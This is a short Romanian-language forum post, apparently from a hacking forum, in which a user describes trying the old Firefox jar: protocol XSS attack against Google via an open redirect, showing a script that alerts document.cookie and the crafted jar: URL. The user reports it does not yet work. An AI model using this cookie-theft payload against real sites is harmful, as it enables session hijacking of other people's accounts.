Jump to content
moubik

firefox jar vulnerability

Recommended Posts

de fiecare data ma cearta escalation cand postez ceva la vip.

sa vad ce idei aveti voi

------------------

A reusit cineva sa faca sa mearga asta?

http://www.gnucitizen.org/blog/java-jar-attacks-and-features

http://www.gnucitizen.org/blog/severe-xss-in-google-and-others-due-to-the-jar-protocol-issues

http://www.gnucitizen.org/blog/web-mayhem-firefoxs-jar-protocol-issues

-------------------

pana acum am facut asta:

am creat un fisier html.html in care am pus codul:


<script>
function testing()
{
alert(document.cookie);
}

</script>
<script>setTimeout("testing()", 1000)</script>

acest fisier htm.html arhivat in htm.jar

si accesat linkul in firefox:

jar:http://groups.google.com/searchhistory/url?url=http://site.com/htm.jar!/htm.htm

problema e ca nu imi afiseaza nimic in alert box. dar daca dau de la web developer plugin show cookie, imi arata cookieul de google.

merge sa execut alt tip de javascript. dar nu inteleg de ce nu merge cookie stuff.

poate trebuie sa ma axez mai mult pe csrf aici..

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...